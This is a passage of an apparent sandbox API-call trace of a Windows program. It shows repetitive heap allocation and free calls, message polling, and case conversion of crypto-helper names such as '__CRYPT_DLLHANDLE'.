RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda08 [0172.332] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2728 [0172.332] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0172.332] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd648 [0172.332] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee48 [0172.332] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba570 [0172.332] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2728 [0172.332] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd408 [0172.332] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2638 [0172.332] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xe8ff) returned 0x9c5180 [0172.334] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df028 [0172.334] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7e0 [0172.334] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26b8 [0172.334] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7e0 | out: hHeap=0x8a0000) returned 1 [0172.335] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8defd8 [0172.335] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7e0 [0172.335] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee20 [0172.335] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba168 [0172.335] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27b8 [0172.335] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdb10 [0172.335] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee70 [0172.335] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fd0 [0172.335] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27d8 [0172.335] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd420 [0172.335] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db138 [0172.335] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0172.335] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27f8 [0172.335] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0172.335] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27f8 [0172.335] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0172.335] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90b018 [0172.335] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0172.335] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df118 [0172.335] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd918 [0172.335] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27f8 [0172.335] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd918 | out: hHeap=0x8a0000) returned 1 [0172.335] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def10 [0172.336] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd918 [0172.336] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba498 [0172.336] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2748 [0172.336] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba498 | out: hHeap=0x8a0000) returned 1 [0172.336] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27e8 [0172.336] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db180 [0172.336] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0172.336] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db180 | out: hHeap=0x8a0000) returned 1 [0172.336] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27e8 | out: hHeap=0x8a0000) returned 1 [0172.336] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8debc8 [0172.336] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c27e8 [0172.336] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec68 [0172.336] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba498 [0172.336] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2658 [0172.336] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0172.336] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd498 [0172.336] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df190 [0172.336] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba618 [0172.336] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2658 [0172.336] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba618 | out: hHeap=0x8a0000) returned 1 [0172.336] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dedf8 [0172.336] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba618 [0172.336] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db180 [0172.337] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0172.337] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deda8 [0172.337] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd810 [0172.337] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2678 [0172.337] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fb8 [0172.337] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fa0 [0172.337] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0172.337] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fa0 | out: hHeap=0x8a0000) returned 1 [0172.337] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded08 [0172.337] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fa0 [0172.337] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2878 [0172.337] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd750 [0172.337] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2878 | out: hHeap=0x8a0000) returned 1 [0172.337] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d480 [0172.337] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2878 [0172.337] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0a0 [0172.337] CharLowerBuffW (in: lpsz="uint;dword", cchLength=0xa | out: lpsz="uint;dword") returned 0xa [0172.337] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa4f8 [0172.337] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda38 [0172.337] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2758 [0172.337] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd588 [0172.337] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27c8 [0172.337] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba018 [0172.337] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2828 [0172.338] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4c8 [0172.338] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2778 [0172.338] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0172.338] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2888 [0172.338] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0172.338] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2888 | out: hHeap=0x8a0000) returned 1 [0172.338] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4c8 | out: hHeap=0x8a0000) returned 1 [0172.338] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2778 | out: hHeap=0x8a0000) returned 1 [0172.338] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba018 | out: hHeap=0x8a0000) returned 1 [0172.338] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2828 | out: hHeap=0x8a0000) returned 1 [0172.338] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2828 [0172.338] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2778 [0172.338] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df0a0 | out: hHeap=0x8a0000) returned 1 [0172.338] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2878 | out: hHeap=0x8a0000) returned 1 [0172.338] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd750 | out: hHeap=0x8a0000) returned 1 [0172.338] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fa0 | out: hHeap=0x8a0000) returned 1 [0172.338] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded08 | out: hHeap=0x8a0000) returned 1 [0172.338] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0172.338] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0172.338] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded08 [0172.338] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fa0 [0172.338] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0172.338] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d420 [0172.338] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa4a8 [0172.339] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd750 [0172.339] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2878 [0172.339] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba018 [0172.339] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2888 [0172.339] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0172.339] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4c8 [0172.339] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0172.339] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0172.339] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0172.339] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0172.339] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0172.339] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba018 | out: hHeap=0x8a0000) returned 1 [0172.339] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2888 | out: hHeap=0x8a0000) returned 1 [0172.339] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd750 | out: hHeap=0x8a0000) returned 1 [0172.339] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2878 | out: hHeap=0x8a0000) returned 1 [0172.339] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa4a8 | out: hHeap=0x8a0000) returned 1 [0172.339] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0172.339] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fa0 | out: hHeap=0x8a0000) returned 1 [0172.339] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4c8 | out: hHeap=0x8a0000) returned 1 [0172.339] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0172.339] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded08 | out: hHeap=0x8a0000) returned 1 [0172.339] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0172.339] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded08 [0172.340] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0172.340] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2878 [0172.340] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4c8 [0172.340] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fa0 [0172.340] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2888 [0172.340] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fa0 | out: hHeap=0x8a0000) returned 1 [0172.340] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0a0 [0172.340] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fa0 [0172.340] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0172.340] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28c8 [0172.340] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0172.340] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0172.340] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0172.340] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28c8 | out: hHeap=0x8a0000) returned 1 [0172.340] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd750 [0172.340] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db2e8 [0172.340] PeekMessageW (in: lpMsg=0x87e2d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e2d4) returned 0 [0172.340] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28c8 [0172.340] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0172.340] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0172.340] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28c8 | out: hHeap=0x8a0000) returned 1 [0172.341] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db2e8 | out: hHeap=0x8a0000) returned 1 [0172.341] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd750 | out: hHeap=0x8a0000) returned 1 [0172.341] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0172.341] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd750 [0172.341] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0172.341] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba018 [0172.341] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0172.341] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f70 [0172.341] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0172.341] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5b8 [0172.341] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0172.341] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3f0 [0172.341] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0172.341] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7b0 [0172.341] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0172.341] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd930 [0172.341] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0172.341] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0172.341] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd378 [0172.342] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0172.342] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0f0 [0172.342] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0172.342] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4e0 [0172.342] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0172.342] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0172.342] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd510 [0172.342] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0172.342] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4e0 [0172.342] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0172.342] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db2e8 [0172.342] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df0a0 | out: hHeap=0x8a0000) returned 1 [0172.342] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8e8 [0172.342] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0172.342] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0a0 [0172.342] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a90 [0172.342] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28c8 [0172.342] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d420 [0172.342] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa4a8 [0172.343] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3d8 [0172.343] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2818 [0172.343] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd390 [0172.343] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26c8 [0172.343] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28c8 | out: hHeap=0x8a0000) returned 1 [0172.343] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9d8 [0172.343] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28c8 [0172.343] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28c8 | out: hHeap=0x8a0000) returned 1 [0172.343] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd390 | out: hHeap=0x8a0000) returned 1 [0172.343] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0172.343] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3d8 | out: hHeap=0x8a0000) returned 1 [0172.343] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0172.343] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa4a8 | out: hHeap=0x8a0000) returned 1 [0172.343] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0172.343] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a90 | out: hHeap=0x8a0000) returned 1 [0172.343] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9d8 | out: hHeap=0x8a0000) returned 1 [0172.343] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df0a0 | out: hHeap=0x8a0000) returned 1 [0172.343] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0172.343] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9d8 [0172.343] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0172.343] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a90 [0172.343] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0172.344] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3d8 [0172.344] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0172.344] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0a0 [0172.344] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd390 [0172.344] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0172.344] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d420 [0172.344] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa4a8 [0172.344] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9e38 [0172.344] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26c8 [0172.344] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8a0 [0172.344] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28c8 [0172.344] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0172.344] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba078 [0172.344] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0172.344] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0172.344] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8a0 | out: hHeap=0x8a0000) returned 1 [0172.344] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28c8 | out: hHeap=0x8a0000) returned 1 [0172.344] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9e38 | out: hHeap=0x8a0000) returned 1 [0172.344] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0172.344] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa4a8 | out: hHeap=0x8a0000) returned 1 [0172.344] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0172.344] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd390 | out: hHeap=0x8a0000) returned 1 [0172.345] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba078 | out: hHeap=0x8a0000) returned 1 [0172.345] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df0a0 | out: hHeap=0x8a0000) returned 1 [0172.345] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0172.345] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba078 [0172.345] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0172.345] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd390 [0172.345] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0172.345] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9e38 [0172.345] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0172.345] 